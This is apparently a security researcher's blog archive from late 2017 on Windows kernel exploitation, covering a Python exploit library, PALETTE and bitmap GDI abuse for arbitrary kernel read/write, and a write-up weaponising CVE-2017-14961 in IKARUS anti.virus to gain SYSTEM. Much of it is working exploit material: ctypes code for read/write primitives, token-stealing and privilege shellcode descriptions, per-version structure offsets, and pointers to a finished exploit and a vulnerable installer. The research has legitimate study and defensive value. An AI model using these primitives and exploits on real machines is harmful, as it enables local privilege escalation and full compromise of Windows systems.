Friday, December 1, 2017

kex - python kernel exploit library - update #3

Another week passed, another update. Not sure how long I can keep up with this frequency :)

  • all 3 shellcodes (token stealing, update token privileges, update ACL of target process)
    • padded all of them with NOPs, so their length is divisible by 4, this is required if we use PALETTE objects as r/w primitive to write the shellcode somewhere. If the shellcode is not divisible by 4, the last couple of bytes will be missing as we can only write multiplies of 4 with PALETTEs
    • in newer Windows versions the KTHREAD->Process pointer is larger than 0x7f (specifically 0xb8), which means that the assembly code is different
      • for sizes <0x80:
        • "\x48\x8b\x40" + 1 byte value (e.g.: 0x7f)
      • for sizes >=0x80:
        • "\x48\x8b\x80" + 1 byte value (e.g.: 0xb8) + "\x00\x00\x00"
  • all 3 shellcodes are verified now to work
The new additions are based on the following resources:

  • Leaking NT base, HalDispatchTable, PTE base address using PALETTE objects
  • Calculate PTE address for a given virtual address
  • Ability to change a VA to executable
  • An example for the new functions using the HEVD driver as usual
With that you can write a shellcode to kernel space, change the PTE address execution flags, update HalDisPatchTable and trigger shellcode - this is what happens in the added example. All works from low privilege mode, up to Windows 10 RS3 (v1709 / FCU).

Saturday, November 25, 2017

kex - python kernel exploit library - major update #2

I made a larger update to my kex library again. Token stealing is not the only way in kernel exploitation, suggest to read the following:

I essentially implemented additional shellcodes based on Cerudo's BlackHat talk and Martin Schenk's blogpost, there are a few differences to how I implemented them vs how Martin did:

  1. I elevate my own process privileges, not the parent or cmd.exe
  2. I use different offset in KTHREAD to find the EPROCESS structure (nt!_KTHREAD ->  _KAPC_STATE -> EPROCESS), so you will see different values there
  3. I used PALETTEs for data-only pwning and not the tagWND method, this also means that it won't work beyond Win10 RS3
  4. The token overwrite has been extended to also change the Present bit as it is required after Win10 RS3, as described here:!_SEP_TOKEN_PRIVILEGES-Single_Write_EoP_Protect.pdf
  5. I added all offsets from Win7 to Win10 RS3 so the code should work universally across all platforms

I added an example with the HEVD driver to show how all these works. I didn't have a chance to test the actual shellcodes, only the data-only variant, so if any issues, let me know.


Wednesday, November 15, 2017

Turning CVE-2017-14961 (IKARUS anti.virus local kernel exploit) into full arbitrary read / write with PALETTE objects

There are 9 exploitable kernel vulnerabilities discovered in IKARUS anti.virus <2.6.18 discovered by @ParvezGHH. You can read more about them here:

I found the exploit for the above CVE very nice and clean by Parvez, I usually like simplicity. This specific vulnerability provides the ability for an attacker to write 0x11 to an arbitrary location, which is entirely under the control of the attacker. Triggering is extremely simple, we send in an empty input, and 0x11 will be written to the address we provide for the output buffer. Parvez used this to overwrite the TOKEN privileges of the given process to gain SeDebugPriviliges and after that injecting a cmd.exe shell code into winlogon.exe. Nice and clean and works universally. I took the opportunity to write this in python and extend my kex library with some useful functions that perform the TOKEN lookup and code injection.

However I wanted to practice a bit of kernel exploitation techniques and decided to turn this into a full arbitrary read / write. In short I wanted to be able to read / write any kernel memory of my choice with the value I want. I also wanted to keep the exploit universal (Win7 to Win10RS3) and if possible trigger it from low integrity mode. I’m not done with the low integrity part, but if I will have time later I will try to finish it, but all the others went fine.

An universal read / write can be done if we can use the PALETTE read / write primitives, but obviously we can’t directly overwrite the pFirstColor pointer of any palette with the vulnerability. So I went to utilise the idea of out of bounds write, which is commonly used with session pool spraying with GDI objects. Let me explain step-by-step the game plan.
  1. Allocate two palettes at known location
  2. Overwrite the cEntries field of one of the palettes, and thus increasing the size.
  3. Use the enlarged palette to overwrite the pFirstColor offset in the second palette —> we are pretty much done at this point, as we can use the regular read / write primitives
  4. Steal token
The first point is achieved via reserving and freeing Windows, and if they get allocated to the same place, we can predict that if we free it and allocate the palette next, it will be at the same location, this works for large pools, for objects size >= 0x1000 (4kB). This is pretty standard, and easy, already implemented in my kex library. Essentially this is the code snippet to do this:

palette_1_address = alloc_free_windows(0)
palette_1_handle = create_palette_with_size(0x1000)
palette_1_pFirstColor = palette_1_address + pFirstColor_offset

palette_2_address = alloc_free_windows(0)
palette_2_handle = create_palette_with_size(0x1000)
palette_2_pFirstColor = palette_2_address + pFirstColor_offset

The second point is to calculate the address where we want to write 0x11. From this point on, we need to make sure that we use the palettes in the right order, as there is no guarantee that palette1 is placed in a lower memory location than palette2, although likely. In this writeup let’s assume that palette1 comes before palette2. So the location is:

palette_1_address + cEntries + 3

cEntries is always 0x1c, and the number of entries is stored on 4 bytes (32 bits). The +3 is needed in order to overwrite the high order byte. If we look on a dump, this is what we will get after the overwrite:

0: kd> dd ffffe5b784730000
ffffe5b7`84730000  9c080a13 ffffffff 00000000 00000000
ffffe5b7`84730010  5fe03700 ffffad0d 00000501 110003de
ffffe5b7`84730020  0006e3f4 00000000 00000000 00000000
ffffe5b7`84730030  00000000 00000000 00000000 00000000
ffffe5b7`84730040  00000000 00000000 00000000 00000000
ffffe5b7`84730050  00000000 00000000 00000000 00000000
ffffe5b7`84730060  00000002 00000001 00000000 00000000
ffffe5b7`84730070  00000000 00000000 84730088 ffffe5b7

This effectively increases the size of the palette to 0x110003de * 4 (from 0x000003de * 4) as one palette entry takes 4 bytes. This should be sufficient to get an overlap with palette2.

As for code:
outputbuffer = palette_1_address + 0x1c + 3

The third step is to overwrite the other palette’s pFirstColor pointer and point it to palette1’s pFirstColor memory address. The last part is easy, we just add the proper offset to palette1’s address, which is 0x78 or 0x80 depending on the platform (as of this writing). How do we overwrite palette2’s pFirstColor pointer? We need to calculate the distance of it beginning from palette1’s first entry. The calculation is:

distance = (palette_2_address + pFirstColor_offset) - (palette_1_address + apalColors_offset)

In words: we take the memory location of the target (palette2address + pFirstColoroffset) and subtract the memory location of the very first entry of palette1 (palette_1address + apalColorsoffset). apalColorsoffset is 0x10 after pFirstColor on x64. We divide this distance by 4 (remember, with palettes we write one entry which is 4 bytes) and get the right index (iStart) to use with the SetPalette function. Code:

address = c_ulonglong(palette_1_pFirstColor)
gdi32.SetPaletteEntries(palette_1_handle, distance/4, sizeof(address)/4, addressof(address));
manager_palette_handle = palette_2_handle
worker_palette_handle = palette_1_handle

At this stage I run into a problem where my code started to overwrite random memory locations, regardless of what the distance is (at least this is how it looked). I was pretty sure I’m right, and I had no idea for hours what goes wrong here. Finally found it. SetPaletteEntries expects an unsigned INT for the iStart index. I didn’t converted the distance to UINT, and it was passed as a signed INT, and as it was quite large, it pointed to another place I expected. This was a good learning for later, I need to watch out for correct ctypes conversion. So the above line correctly is:

gdi32.SetPaletteEntries(palette_1_handle, c_uint(distance/4), sizeof(address)/4, addressof(address));

Once this is done, the only thing remained is to perform token stealing with palettes. Up until this point the entire exploit runs from low integrity mode as well. The token stealing won’t because of the way it’s implemented, but I will look for something else later on.

tokenstealing_with_palettes(manager_palette_handle, worker_palette_handle)

I think the above idea can be easily generalised for similar cases, when we can control the memory location of the overwrite, but not the content. If we can increase the size of a palette, we can gain full read / write.

If you want to play with this, the following happens to be an IKARUS 2.6.15 installer, which is vulnerable:

The above exploit is uploaded here:
It doesn't always work for first, but run it a few times, and eventually you will get SYSTEM.

UPDATE 2017.11.25.:

With the new release of kex, this exploit can work entirely from low integrity mode.

Tuesday, October 31, 2017

Abusing GDI objects for kernel exploitation - PALETTE and various offsets

I started to dig into the topic of abusing GDI objects for Windows kernel exploitation about two weeks ago, and finally get to the PALETTEs. There are many documentation about BITMAPs so I don’t really want to write about those, but there has been little write-ups about PALETTEs. There are three that I relied on during my research:

I decided to implement PALETTE read-write primitives for my kex Python library, and this post is about how did I do that. Basically we need the following info:
  1. What is their size and offset?
  2. How to create them?
  3. How to read / write with them?
Every document I read showed the following structure outline:

typedef struct _PALETTE64
    BASEOBJECT64      BaseObject;    // 0x00
    FLONG           flPal;         // 0x18
    ULONG32           cEntries;      // 0x1C
    ULONG32           ulTime;        // 0x20 
    HDC             hdcHead;       // 0x24
    ULONG64        hSelected;     // 0x28, 
    ULONG64           cRefhpal;      // 0x30
    ULONG64          cRefRegular;   // 0x34
    ULONG64      ptransFore;    // 0x3c
    ULONG64      ptransCurrent; // 0x44
    ULONG64      ptransOld;     // 0x4C
    ULONG32           unk_038;       // 0x38
    ULONG64         pfnGetNearest; // 0x3c
    ULONG64   pfnGetMatch;   // 0x40
    ULONG64           ulRGBTime;     // 0x44
    ULONG64       pRGBXlate;     // 0x48
    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

What is important from this is the full size of the structure, which is 0x90 (that is the offset to the PALETTEENTRY array) and the offset to pFirstColor, which points to the array, and this is the pointer that will need to be overwritten to get the read / write primitives. This is at offset 0x80 at every documentation I saw so far, and what you can read everywhere is that this technique works up to Windows10 v1709 (RS3) - and maybe even later, but we don’t know that yet.

The size of the entire object without the POOL_HEADER is basically this PALETTE64 structure + the PALETTEENTRY array. One PALETTEENTRY is 4 bytes as we can see (this will be important later):

class PALETTEENTRY(Structure):
 _fields_ = [
  ("peRed", BYTE),
  ("peGreen", BYTE),
  ("peBlue", BYTE),
  ("peFlags", BYTE)

There is a nice implementation made by Sebastian Apelt from Siberas (see the link above), which I also used as my base in my Python implementation. To create a PALETTE, there is a simple API call:

HPALETTE CreatePalette(
  _In_ const LOGPALETTE *lplgpl

where LOGPALETTE looks like this:

class LOGPALETTE(Structure):
 _fields_ = [
  ("palVersion", WORD),
  ("palNumEntries", WORD),

So essentially to create a PALETTE, we need to calculate the size, populate the structure, and call the API, somehow like this:

pal_cnt = (size - palette_entries_offset) / 4
lPalette = LOGPALETTE()
lPalette.palNumEntries = pal_cnt
lPalette.palVersion = 0x300
palette_handle = gdi32.CreatePalette(byref(lPalette))

As the PALETTEENTRY is 4 bytes, we need to calculate the proper number of entries required for us to reserve the proper size.

Once we have this, we can start read / write, once we overwritten the manager’s palette pFirstColor pointer. To perform these actions we can use the following functions.

UINT GetPaletteEntries(
  _In_  HPALETTE       hpal,
  _In_  UINT           iStartIndex,
  _In_  UINT           nEntries,

UINT SetPaletteEntries(
  _In_       HPALETTE     hpal,
  _In_       UINT         iStart,
  _In_       UINT         cEntries,
  _In_ const PALETTEENTRY *lppe

These can be used just as we used GetBitmapBits / SetBitmapBits. There is an important difference, here we tell the function to read X number of PALETTEENTRYs, which is 4 bytes long. This means that if we want to read 8 bytes (an address in x64), we need to provide the value 2 - dividing the size by 4. That’s it, after that it’s essentially the same. Here is my Python implementation:

def set_address_palette(manager_platte_handle, address):
 address = c_ulonglong(address)
 gdi32.SetPaletteEntries(manager_platte_handle, 0, sizeof(address)/4, addressof(address));
def write_memory_palette(manager_platte_handle, worker_platte_handle, dst, src, len):
 set_address_palette(manager_platte_handle, dst)
 gdi32.SetPaletteEntries(worker_platte_handle, 0, len/4, src)

def read_memory_palette(manager_platte_handle, worker_platte_handle, src, dst, len):
 set_address_palette(manager_platte_handle, src)
 gdi32.GetPaletteEntries(worker_platte_handle, 0, len/4, dst)

and basically that’s it, essentially this will work the same as BITMAPs. You can leak the kernel address of the object with Window objects just as we did with BITMAPs on Win10 v1703 (or earlier). This leak will also work on Win10 v1709.

Wish everything was so simple!

So I started to test this on Win10 v1511, and it worked for first! Nice! I was happy :) It took some time to build a Win10 v1709, so I went ahead and run the same exploit on Win10 v1607, and…. BSOD!! I run it again, and got BSOD again with POOL corruption. So I started to dig into what goes on as I was pretty sure I’m overwriting something wrong. Notice the problem?

0: kd> dc ffff89c9c4611000
ffff89c9`c4611000  7e08083b 00000000 00000000 00000000  ;..~............
ffff89c9`c4611010  d9c0a080 ffff910b 00000501 000003de  ................
ffff89c9`c4611020  00003868 00000000 00000000 00000000  h8..............
ffff89c9`c4611030  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611040  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611050  00000000 00000000 00000000 00000000  ................
ffff89c9`c4611060  00000002 00000001 00000000 00000000  ................
ffff89c9`c4611070  00000000 00000000 c4611088 ffff89c9  ..........a.....
ffff89c9`c4611080  c4611000 ffff89c9 00000000 00000000  ................

0: kd> !pool ffff89c9c4611000
Pool page ffff89c9c4611000 region is Unknown
ffff89c9c4611000 is not a valid large pool allocation, checking large session pool...
*ffff89c9c4611000 : large page allocation, tag is Gh08, size is 0x1010 bytes
  Pooltag Gh08 : GDITAG_HMGR_PAL_TYPE, Binary : win32k.sys

So this is the end of the PALETTE64 structure:

    PALETTEENTRY    *pFirstColor;  // 0x80
    struct _PALETTE *ppalThis;     // 0x88
    PALETTEENTRY    apalColors[3]; // 0x90

This doesn’t align with the output from WinDBG dump. So it turns out the new offsets are:

    PALETTEENTRY    *pFirstColor;  // 0x78
    struct _PALETTE *ppalThis;     // 0x80
    PALETTEENTRY    apalColors[3]; // 0x88

I didn’t check what is missing or what became smaller, but from Win10 v1607 this is the correct offset, including v1709.

Sweet, so now that is fixed, I got this working on v1607 and v1703, but it broke on v1709! It didn’t BSOD but I couldn’t leak the address anymore! What? Everyone said it works! Ok, let’s see the Window leak. The offsets changed there at version v1703, so there was a good chance they did again on v1709. Essentially:

Windows 10x64 v1607 and earlier (? - only tested back to v1511, not sure on Win8 or 7):
pcls = 0x98
lpszMenuNameOffset = 0x88

Windows10x64 v1703:
pcls = 0xa8
lpszMenuNameOffset = 0x90

Windows10x64 v1709:
pcls = 0xa8
lpszMenuNameOffset = 0x98

Once I fixed these as well, all started to work.

I checked and the structure offsets required for token stealing didn’t change, so essentially that was all.

Structure offsets change too often, and sometimes it’s not easy to track them down, essentially this is one of the reasons I’m trying to make 'kex' and hardcode all these offsets, so I can make OS independent exploits. With the current version you can essentially call these functions on version of Win10x64 and get it work reliably. Link: GitHub - theevilbit/kex

In order to make it easier for people contributing to offsets, and also make it easier for those, who want to code the same in different languages, I’m starting an offset table on the same GitHub repo. Directly:

Saturday, October 28, 2017

kex - python kernel exploit library - major update

I made a major update to my Python kernel exploitation 'library' (kex). In short:

  • GDI abuse functions (original source:
  • Wrapper functions for GDI abuse to mask the platform (Will work from Win7x64 to Win10x64 v1703 universally using different methods based on the platform)
  • Calculate bitmap sizes based on platform (Win7x64 SP1 - Win10 v1607)
  • Added lots of x64 struct constants (KTHREAD_Process, EPROCESS_ActiveProcessLinks, EPROCESS_UniqueProcessId, EPROCESS_Token)
  • Lot's of comments
I also uploaded an example to show how it can ease exploit development. The use case is the HackSysExtremeVulnerbaleDriver Arbitrary overwrite, where it will do it with GDI abuse. Under the hood it will do different techniques related to the platform.


Some items from my todo list:
  • pool spraying with bitmaps
  • PALETTE objects
  • other kernel pool spraying techniques
  • enable GDI abuse techniques for x86
If I made any errors submit a pull request or leave a comment.

Friday, October 27, 2017

Abusing GDI objects: Bitmap object’s size in the kernel pool

I’m looking into the GDI object abuse techniques for kernel pool exploitation, and found that there is no documentation about how large memory is allocated to the Bitmap object in the kernel paged pool. I read though many exploit codes, articles, but it seemed that everyone is doing this by trial and error, so I decided to take a look, and try to find logic in the allocation.

The function to create a bitmap is:

HBITMAP CreateBitmap(
_In_ int nWidth,
_In_ int nHeight,
_In_ UINT cPlanes,
_In_ UINT cBitsPerPel,
_In_ const VOID *lpvBits

Every code I saw sets the cPlanes to “1” and the *lpvBits to NULL, so let’s ignore them, and use that setting. The rest of the variables are related to the bitmap’s actual size, and it makes perfect sense for those to affect the object size allocated.

We will also need to make difference between two cases:
  1. When the bitmap < 0x1000
  2. When the bitmap >= 0x1000, in this case the allocation goes to the large paged pool allocation table
Let’s start with the first one, and try a few cases on Windows 10x64 v1511. My first try is:
create_bitmap(820, 2, 8)

nWidth = 820
nHeight = 2
cBitsPerCel = 8

I use some functions to leak the address to the kernel so I can easily find it. Unfortunately WinDBG is not really helpful with the !pool, !poolfind, etc… commands (they don’t work) and I’m not sure why. Also the dt nt!_POOL_HEADER returns:

Symbol nt!_POOL_HEADER not found.

So I need to do this the hard way. This is the dump of the bitmap with the POOL_HEADER., which is the first 0x10 bytes. It is followed by the Bitmap object. The pvscan0 value, which is the most interesting to everyone usually, points to 0x258 offset from the beginning of the OBJECT (SURFACE64 in this case - obviously this symbol is also not found by WinDBG, why would it ease things…).

kd> dc 0xfffff90144314010-10
fffff901`44314000  238d0000 35306847 00000000 00000000  ...#Gh05........
fffff901`44314010  060509ac 00000000 00000000 00000000  ................
fffff901`44314020  00000000 00000000 00000000 00000000  ................
fffff901`44314030  060509ac 00000000 00000000 00000000  ................
fffff901`44314040  00000000 00000000 00000334 00000002  ........4.......
fffff901`44314050  00000668 00000000 44314268 fffff901  h.......hB1D....
fffff901`44314060  44314268 fffff901 00000334 00002402  hB1D....4....$..
fffff901`44314070  00000003 00010000 00000000 00000000  ................

If I take the size of the bitmap: (820 x 2 x 8) / 8 bits = 0x668
SURFACE64 + STUFF = 0x258
This sums up to 0x8d0, and if we check:

kd> dc 0xfffff90144314010-10+8d0 L4
fffff901`443148d0  0073008d 00000000 00000000 00000000  ..s.............

The next POOL_HEADER indeed reports that the previous pool size is 0x8d (x 0x10) = 0x8d0, so looks like the above calculation is about right, but we will need to refine it.

create_bitmap(1000, 2, 8)
Here we need to refine it a bit:
BITMAP: (1000 x 2 x 8) / 8 bits = 0x7d0
SURFACE64 + STUFF = 0x258
If we sum it, it add to 0xa38, however we need to pad it so:
SIZE mod 0x10 = 0
Which gives us 0xa40
and indeed we can see this:

kd> dc 0xfffff90140764010-0x10
fffff901`40764000  23a40000 35306847 9bbcb758 8476aa01  ...#Gh05X.....v.
fffff901`40764010  da0530cd ffffffff 00000000 00000000  .0..............
fffff901`40764020  00000000 00000000 00000000 00000000  ................
fffff901`40764030  da0530cd ffffffff 00000000 00000000  .0..............
fffff901`40764040  00000000 00000000 000003e8 00000002  ................
fffff901`40764050  000007d0 00000000 40764268 fffff901  ........hBv@....
fffff901`40764060  40764268 fffff901 000003e8 000090b3  hBv@............
fffff901`40764070  00000003 00010000 00000000 00000000  ................

kd> dc 0xfffff90140764010-0x10+a40
fffff901`40764a40  001600a4 65657246 742b06f2 fffff802  ....Free..+t....
fffff901`40764a50  422a8470 fffff901 40788470 fffff901  p.*B....p.x@....
fffff901`40764a60  00000000 00000000 00000000 00000000  ................
fffff901`40764a70  00000000 00000000 00000000 00000000  ................
fffff901`40764a80  00000000 00000000 00000000 00000000  ................
fffff901`40764a90  00000000 00000000 00000000 00000000  ................
fffff901`40764aa0  423d2018 fffff901 000000c2 000001fe  . =B............
fffff901`40764ab0  00000087 00000000 423d2138 fffff901  ........8!=B....

Let’s see if it work reverse:
I want an allocation of size: 0xe70, the following should do it:
create_bitmap(0xc08, 1, 8)
and it works:

lkd> dc 0xFFFFF901407D1010-10
fffff901`407d1000  23e70000 35306847 00000000 00000000  ...#Gh05........
fffff901`407d1010  08050a4b 00000000 00000000 00000000  K...............
fffff901`407d1020  00000000 00000000 00000000 00000000  ................
fffff901`407d1030  08050a4b 00000000 00000000 00000000  K...............
fffff901`407d1040  00000000 00000000 00000c08 00000001  ................
fffff901`407d1050  00000c08 00000000 407d1268 fffff901  ........h.}@....
fffff901`407d1060  407d1268 fffff901 00000c08 00002ea2  h.}@............
fffff901`407d1070  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF901407D1010-10+e70
fffff901`407d1e70  001900e7 00000000 00000000 00000000  ................
fffff901`407d1e80  407d3e80 fffff901 407cfe80 fffff901  .>}@......|@....
fffff901`407d1e90  00000000 00000000 00000000 00000000  ................
fffff901`407d1ea0  00000000 00000000 00000000 00000000  ................
fffff901`407d1eb0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ec0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ed0  00000000 00000000 00000000 00000000  ................
fffff901`407d1ee0  00000000 00000000 00000000 00000000  ................

So the function would be:

def allocate_bitmap_with_given_size(s):
 width = s - 0x258 - 0x10
 create_bitmap (width, 1, 8)

There is one more thing: it seems that if the bitmap is small, it will be at least 0x370 in size:

create_bitmap(100, 1, 8)

lkd> dc 0xFFFFF9014269B320-10
fffff901`4269b310  23370009 35616c47 65b7acb6 cf1485cc  ..7#Gla5...e....
fffff901`4269b320  06050ad3 00000000 00000000 80000000  ................
fffff901`4269b330  00000000 00000000 00000000 00000000  ................
fffff901`4269b340  06050ad3 00000000 00000000 00000000  ................
fffff901`4269b350  00000000 00000000 00000064 00000001  ........d.......
fffff901`4269b360  00000064 00000000 4269b578 fffff901  d.......x.iB....
fffff901`4269b370  4269b578 fffff901 00000064 00003c23  x.iB....d...#<..
fffff901`4269b380  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF9014269B320-10+370
fffff901`4269b680  00030037 65657246 65b7a926 cf1485cc  7...Free&..e....
fffff901`4269b690  46b60e20 ffffd000 4251c970 fffff901   ..F....p.QB....
fffff901`4269b6a0  4269b6b0 fffff901 13995a90 fffff960  ..iB.....Z..`...
fffff901`4269b6b0  230f0003 34616c47 423b7108 fffff901  ...#Gla4.q;B....
fffff901`4269b6c0  00000000 00000000 00000000 80000000  ................
fffff901`4269b6d0  00000000 00000000 000000d8 00000000  ................
fffff901`4269b6e0  00000000 72724401 4269b738 fffff901  .....Drr8.iB....
fffff901`4269b6f0  4269b6f0 fffff901 4269b6f0 fffff901  ..iB......iB....

create_bitmap(1, 1, 8)

lkd> dc 0xFFFFF90142615370-10
fffff901`42615360  2337000e 35616c47 42615360 fffff901  ..7#Gla5`SaB....
fffff901`42615370  13050ad9 00000000 00000000 80000000  ................
fffff901`42615380  00000000 00000000 00000000 00000000  ................
fffff901`42615390  13050ad9 00000000 00000000 00000000  ................
fffff901`426153a0  00000000 00000000 00000001 00000001  ................
fffff901`426153b0  00000004 00000000 426155c8 fffff901  .........UaB....
fffff901`426153c0  426155c8 fffff901 00000004 0000407f  .UaB.........@..
fffff901`426153d0  00000003 00010000 00000000 00000000  ................
lkd> dc 0xFFFFF90142615370-10+370
fffff901`426156d0  00250037 65657246 65bf4976 cf1485cc  7.%.FreevI.e....
fffff901`426156e0  42417570 fffff901 46b61040 ffffd000  puAB....@..F....
fffff901`426156f0  40768dd0 fffff901 488e1a50 000001f8  ..v@....P..H....
fffff901`42615700  00000000 00000000 00000000 00000000  ................
fffff901`42615710  00000000 00000000 00000000 00000000  ................
fffff901`42615720  00000000 00000000 00000000 00000000  ................
fffff901`42615730  00000000 00000000 00000000 00000000  ................
fffff901`42615740  00000000 00000000 00000000 00000000  ................

So this is for the smaller allocations. For allocations at least 0x1000, we don’t have POOL_HEADER, as they go to the large pool, so if I do:

create_bitmap(0xda8, 1, 8)

(0xda8 + 0x258 = 0x1000)

They are allocated right after each other:

[+] Bitmap handle: 0x370508e8L
[*] Bitmap's kernel address: 0xFFFFF901426E0000
[+] Bitmap handle: 0xffffffffa80507d0L
[*] Bitmap's kernel address: 0xFFFFF901426E1000
[+] Bitmap handle: 0x38050680L
[*] Bitmap's kernel address: 0xFFFFF901426E2000
[+] Bitmap handle: 0x2405067fL
[*] Bitmap's kernel address: 0xFFFFF901426E3000

If I do:

create_bitmap(0x12a8, 1, 8)

That will create an 0x1500 byte allocation, and finally the !pool command started to produce output:

lkd> !pool 0xFFFFF90142768000
Pool page fffff90142768000 region is Paged session pool
fffff90142768000 is not a valid large pool allocation, checking large session pool...
*fffff90142768000 : large page allocation, tag is Gh05, size is 0x1500 bytes
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys

We can also see the “Frag” and “Free” tags at the end, marking the end of the allocation:

lkd> dc 0xFFFFF90142768000 + 1500
fffff901`42769500  23020000 67617246 00000000 00000000  ...#Frag........
fffff901`42769510  00001500 00000000 00000000 00000000  ................
fffff901`42769520  00ae0002 65657246 00000000 00000000  ....Free........
fffff901`42769530  4276b530 fffff901 42767530 fffff901  0.vB....0uvB....
fffff901`42769540  00000000 00000000 00000000 00000000  ................
fffff901`42769550  00000000 00000000 00000000 00000000  ................
fffff901`42769560  00000000 00000000 00000000 00000000  ................
fffff901`42769570  00000000 00000000 00000000 00000000  ................

So our final function would be:

def allocate_bitmap_with_given_size(s):
 if s < 0x370:
  print "[-] Too small size, such Bitmap can’t be allocated…"
 elif s < 0x1000:
  print "[+] Allocating Bitmap in the Paged paged pool"
  width = s - 0x258 - 0x10
  create_bitmap (width, 1, 8)
  print "[+] Allocating Bitmap in the Paged session pool / large pool"
  width = s - 0x258
  create_bitmap (width, 1, 8)

If I made any mistakes, let me know. This was tested on Win10 x64 v1511 only. The structures are different on x86 so that will be different for sure.

Here is the Python code I used for testing:

from ctypes import *
from ctypes.wintypes import *

ULONG = c_uint32

class PEB(Structure):
 _fields_ = [
  ("Stuff", c_byte * 0xF8),
  ("GdiSharedHandleTable", PVOID)
 _fields_ = [
  ("Reserved1", PVOID),
  ("PebBaseAddress", POINTER(PEB)),
  ("Reserved2", PVOID * 2),
  ("UniqueProcessId", ULONG_PTR),
  ("Reserved3", PVOID)

class GDICELL64(Structure):
 _fields_ = [
  ("pKernelAddress", PVOID64),
  ("wProcessId", USHORT), 
  ("wCount", USHORT),
  ("wUpper", USHORT),
  ("wType", USHORT),
  ("pUserAddress", PVOID64)

ntdll = windll.ntdll
gdi32 = windll.gdi32
kernel32 = windll.kernel32

ntdll.NtQueryInformationProcess.argtypes = [HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG]
ntdll.NtQueryInformationProcess.restype = NTSTATUS

gdi32.CreateBitmap.argtypes = [c_int, c_int, UINT, UINT, c_void_p]
gdi32.CreateBitmap.restype = HBITMAP

ProcessBasicInformation = 0 #Retrieves a pointer to a PEB structure that can be used to determine whether the specified process is being debugged, and a unique value used by the system to identify the specified process. It is best to use the CheckRemoteDebuggerPresent and GetProcessId functions to obtain this information.

def create_bitmap(width, height, cBitsPerPel):
 bitmap_handle = HBITMAP()

 bitmap_handle = gdi32.CreateBitmap(width, height, 1, cBitsPerPel, None)
 if bitmap_handle == None:
  print "[-] Error creating manager bitmap, exiting...."
 print "[+] Bitmap handle: %s" % hex(bitmap_handle)
 return bitmap_handle
def get_gdisharedhandletable():
 This function will return the GdiSharedHandleTable address of the current process
 process_basic_information = PROCESS_BASIC_INFORMATION()
 ntdll.NtQueryInformationProcess(kernel32.GetCurrentProcess(), ProcessBasicInformation, byref(process_basic_information), sizeof(process_basic_information), None)
 peb = process_basic_information.PebBaseAddress.contents
 return peb.GdiSharedHandleTable

def get_bitmap_kernel_address(bitmap_handle):
 Get the kernel address of the bitmap, works up to Windows 10 v1511
 gdicell64_address = get_gdisharedhandletable() + (bitmap_handle & 0xFFFF) * sizeof(GDICELL64()) #the address is in user space
 gdicell64 = cast(gdicell64_address,POINTER(GDICELL64))
 print "[*] Bitmap's kernel address: 0x%X" % gdicell64.contents.pKernelAddress
 return gdicell64.contents.pKernelAddress

for i in range(100):
        bitmap_handle = create_bitmap(0x12a8, 1, 8)
        bitmap_kernel_address = get_bitmap_kernel_address(bitmap_handle)

Update (2017.10.28):

Windows 10x64 v1607

Looks like the !poolfind and !pool commands are not broken when debugging this version, so that makes things easier, on the other hand I can’t leak the address of the bitmap with the previous technique. There is an universal method but for that I need to know the size of the bitmap that will be allocated, and also calculate the size of the other object which helps leaking the bitmap address, so it’s a chicken and egg problem. Anyhow, luckily I can use the commands.

create_bitmap(1640, 1, 8)

kd> dc fffff027023f3730-10
fffff027`023f3720  238e004a 35306847 00000000 00000000  J..#Gh05........
fffff027`023f3730  1d050b24 00000000 00000000 00000000  $...............
fffff027`023f3740  00000000 00000000 00000000 00000000  ................
fffff027`023f3750  1d050b24 00000000 00000000 00000000  $...............
fffff027`023f3760  00000000 00000000 00000668 00000001  ........h.......
fffff027`023f3770  00000668 00000000 023f3990 fffff027  h........9?.'...
fffff027`023f3780  023f3990 fffff027 00000668 00005d70  .9?.'...h...p]..
fffff027`023f3790  00000003 00010000 00000000 00000000  ................
kd> !pool fffff027023f3730
Pool page fffff027023f3730 region is Paged session pool
fffff027023f3000 is not a valid large pool allocation, checking large session pool...
 fffff027023f3260 size:   20 previous size:    0  (Allocated)  Frag
 fffff027023f3280 size:  4a0 previous size:   20  (Free)       Free
*fffff027023f3720 size:  8e0 previous size:  4a0  (Allocated) *Gh05
  Pooltag Gh05 : GDITAG_HMGR_SURF_TYPE, Binary : win32k.sys

This became larger (on Win10x64 v1511 this should have been 0x8d0), and the reason for this is that the BITMAP_DATA offset changed from 0x258 to 0x260 (pvscan0 points to here from the beginning on the object).

Let’s take a look on small bitmaps:

create_bitmap(1, 1, 8)

kd> !poolfind Gla5 -session

Scanning large pool allocation table for tag 0x35616c47 (Gla5) (ffffbc07f20c0000 : ffffbc07f20c6000)

fffff027046815c0 : tag Gla5, size     0x360, Paged session pool
fffff02704681930 : tag Gla5, size     0x360, Paged session pool
fffff02704681ca0 : tag Gla5, size     0x360, Paged session pool
fffff02701b792b0 : tag Gla5, size     0x360, Paged session pool
fffff027023af930 : tag Gla5, size     0x360, Paged session pool
fffff027023afca0 : tag Gla5, size     0x360, Paged session pool
kd> dc fffff02702305ca0-10
fffff027`02305c90  23370037 35616c47 00000000 00000000  7.7#Gla5........
fffff027`02305ca0  02050886 00000000 00000000 80000000  ................
fffff027`02305cb0  00000000 00000000 00000000 00000000  ................
fffff027`02305cc0  02050886 00000000 00000000 00000000  ................
fffff027`02305cd0  00045010 fffff027 00000020 00000040  .P..'... ...@...
fffff027`02305ce0  00000100 00000000 02305f00 fffff027  ........._0.'...
fffff027`02305cf0  02305f00 fffff027 00000004 000010c3  ._0.'...........
fffff027`02305d00  00000001 00010000 00000000 00000000  ................
kd> !pool fffff02702305ca0
Pool page fffff02702305ca0 region is Paged session pool
fffff02702305000 is not a valid large pool allocation, checking large session pool...
 fffff02702305260 size:   20 previous size:    0  (Allocated)  Frag
 fffff02702305280 size:   10 previous size:   20  (Free)       Free
 fffff02702305290 size:   b0 previous size:   10  (Allocated)  Uscu Process: ffffbc07f150c800
 fffff02702305340 size:   e0 previous size:   b0  (Allocated)  Gla8
